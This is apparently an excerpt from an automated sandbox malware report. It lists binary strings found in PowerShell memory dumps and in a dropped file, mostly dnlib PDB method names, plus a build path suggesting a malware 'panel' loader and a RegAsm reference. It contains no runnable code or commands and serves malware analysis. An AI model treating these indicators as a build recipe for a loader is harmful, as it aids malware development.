            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Merge source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMemberRef source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamProps source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParamProps source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetSaveSize source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeRef source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResetEnum source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumProperties source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodProps source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembersWithName source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: RegAsm.pdb4 source: gwseuha, 00000011.00000000.414661031.00000000013A2000.00000020.00000001.01000000.00000008.sdmp, gwseuha.12.dr
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetCustomAttributeValue source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineCustomAttribute source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodImpls source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineEvent source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeByName source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethod source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.TranslateSigWithScope source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineUserString source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Save source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeSpecFromToken source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPermissionSetProps source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNativeCallConvFromSig source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CountEnum source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodSemantics source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFields source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethods source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeRefProps source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetSigFromToken source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeSpecs source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CloseEnum source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleRefProps source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToMemory source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeRefByName source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetScopeProps source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMember source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPropertyProps source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumParams source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.MergeEnd source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetEventProps source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumCustomAttributes source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldProps source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumModuleRefs source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeProps source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldProps source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineParam source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteToken source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetClassLayout source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineNestedType source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUnresolvedMethods source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumPermissionSets source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17 source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetRVA source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleFromScope source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethodImpl source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePinvokeMap source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineSecurityAttributeSet source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetClassLayout source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMemberRef source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPermissionSetProps source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetTypeDefProps source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineProperty source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldRVA source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeDefByName source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetModuleProps source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFieldsWithName source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMemberRefs source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResolveTypeRef source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToStream source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodSemantics source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeDefProps source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMethod source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNestedClassProps source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeletePinvokeMap source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromTypeSpec source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodImplFlags source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPinvokeMap source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPinvokeMap source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumSignatures source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldMarshal source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUserStrings source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetRVA source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePermissionSet source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodProps source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPropertyProps source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetUserString source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: D:\New Private Panell Src 3.0\Rump Updated FIX C#\src\obj\Debug\dnlib.pdb source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetInterfaceImplProps source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldMarshal source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeDef source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeDefs source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportMember source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumInterfaceImpls source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberProps source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportType source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromSig source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumEvents source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamForMethodIndex source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineField source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodsWithName source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
